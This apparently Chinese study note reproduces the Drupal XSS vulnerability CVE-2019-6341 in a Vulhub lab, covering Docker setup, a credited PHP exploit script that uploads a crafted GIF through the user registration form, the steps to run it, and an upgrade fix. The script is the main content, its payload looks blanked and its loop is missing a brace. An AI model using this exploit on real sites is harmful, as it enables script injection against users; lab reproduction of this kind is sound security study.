vulhub学习文档-Drupal XSS漏洞

Drupal XSS漏洞

一.漏洞介绍
(一)编号
CVE-2019-6341
(二)概述
Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。
(三)影响版本
在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。
(四)漏洞要求

  1. <= Durpal 8.6.6
  2. 服务端开启评论配图或者攻击者拥有author以上权限的账号
  3. 被攻击者需要访问攻击者的url

三者同时成立,攻击就可进行

二.操作步骤
(一)Vulhub ip地址:http://192.168.126.136
文件位于:/home/vulhub/vulhub-master/drupal /CVE-2019-6341
1.环境搭建 docker-compose build和docker-compose up -d
vulhub学习文档-Drupal XSS漏洞_第1张图片

2.检查docker是否开启 docker-compose ps
在这里插入图片描述

(二)Windows
1.登录测试页面 http://192.168.126.136:8080 正常安装
选择数据库时用sqlite数据库
vulhub学习文档-Drupal XSS漏洞_第2张图片

2.构造POC
Poc:



Date: 1 March 2019

Exploit Author: TrendyTofu

Original Discoverer: Sam Thomas

Version: <= Drupal 8.6.2

Tested on: Drupal 8.6.2 Ubuntu 18.04 LTS x64 with ext4.

Tested not wokring on: Drupal running on MacOS with APFS

CVE : CVE-2019-6341

Reference: https://www.zerodayinitiative.com/advisories/ZDI-19-291/

*/

 

$host = $argv[1];

$port = $argv[2];

 

$pk =   "GET /user/register HTTP/1.1\r\n".

        "Host: ".$host."\r\n".

        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".

        "Accept-Language: en-US,en;q=0.5\r\n".

        "Referer: http://".$host."/user/login\r\n".

        "Connection: close\r\n\r\n";

 

$fp = fsockopen($host,$port,$e,$err,1);

if (!$fp) {die("not connected");}

fputs($fp,$pk);

$out="";

while (!feof($fp)){

  $out.=fread($fp,1);

}

fclose($fp);

 

preg_match('/name="form_build_id" value="(.*)"/', $out, $match);

$formid = $match[1];

//var_dump($formid);

//echo "form id is:". $formid;

//echo $out."\n";

sleep(1);

 

$data =

"Content-Type: multipart/form-data; boundary=---------------------------60928216114129559951791388325\r\n".

"Connection: close\r\n".

"\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"mail\"\r\n".

"\r\n".

"[email protected]\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"name\"\r\n".

"\r\n".

"test2345\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"files[user_picture_0]\"; filename=\"xxx\xc0.gif\"\r\n".

"Content-Type: image/gif\r\n".

"\r\n".

"GIF\r\n".

"\r\n".

"       \r\n".

"              \r\n".

"       \r\n".

"       \r\n".

"       \r\n".

"\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"user_picture[0][fids]\"\r\n".

"\r\n".

"\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"user_picture[0][display]\"\r\n".

"\r\n".

"1\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"form_build_id\"\r\n".

"\r\n".

//"form-KyXRvDVovOBjofviDPTw682MQ8Bf5es0PyF-AA2Buuk\r\n".

$formid."\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"form_id\"\r\n".

"\r\n".

"user_register_form\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"contact\"\r\n".

"\r\n".

"1\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"timezone\"\r\n".

"\r\n".

"America/New_York\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"_triggering_element_name\"\r\n".

"\r\n".

"user_picture_0_upload_button\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"_triggering_element_value\"\r\n".

"\r\n".

"Upload\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"_drupal_ajax\"\r\n".

"\r\n".

"1\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"ajax_page_state[theme]\"\r\n".

"\r\n".

"bartik\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"ajax_page_state[theme_token]\"\r\n".

"\r\n".

"\r\n".

"-----------------------------60928216114129559951791388325\r\n".

"Content-Disposition: form-data; name=\"ajax_page_state[libraries]\"\r\n".

"\r\n".

"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\r\n".

"-----------------------------60928216114129559951791388325--\r\n";

 

$pk = "POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n".

        "Host: ".$host."\r\n".

        "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n".

        "Accept: application/json, text/javascript, */*; q=0.01\r\n".

        "Accept-Language: en-US,en;q=0.5\r\n".

        "X-Requested-With: XMLHttpRequest\r\n".

        "Referer: http://" .$host. "/user/register\r\n".

        "Content-Length: ". strlen($data). "\r\n".

        $data;

echo "uploading file, please wait...\n";

for ($i =1; $i <= 2; $i++){

$fp = fsockopen($host,$port,$e,$err,1);

if (!$fp) {die("not connected");}

fputs($fp,$pk);

$out="";

while (!feof($fp)){

  $out.=fread($fp,1);

 

fclose($fp);

// echo "Got ".$i."/2 500 errors\n";

// echo $out."\n";

sleep(1);

}

echo "please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\n";

?>

(三)Vulhub
1.若未安装php文件,可使用命令apt install php7.2-cli
2.将文件blog-poc.php文件放置在漏洞文件下
vulhub学习文档-Drupal XSS漏洞_第3张图片
vulhub学习文档-Drupal XSS漏洞_第4张图片

命令位于php文件的61行
3.上传文件 php blog-poc.php your-ip 8080
在这里插入图片描述

4.推荐使用ie. Edge,firefox,谷歌
(四)windows
1.登录
http://192.168.126.136:8080/sites/default/files/pictures/2020-09/_0
注:访问的图片名称为_0的原因是因为 Drupal 的规则机制,具体原理见https://paper.seebug.org/897/
推荐使用IE.
Edge,firefox,谷歌 弹窗均被拦截 自带xss拦截
vulhub学习文档-Drupal XSS漏洞_第5张图片
vulhub学习文档-Drupal XSS漏洞_第6张图片

三.漏洞防护
(一)版本升级Drupal至最新版本

参考文章
https://blog.csdn.net/qq_40989258/article/details/105001425
https://www.freebuf.com/vuls/246056.html

本篇为自我学习回顾,不能保证完全正确!!!
网络信息安全-ploto

你可能感兴趣的:(vulhub,安全漏洞)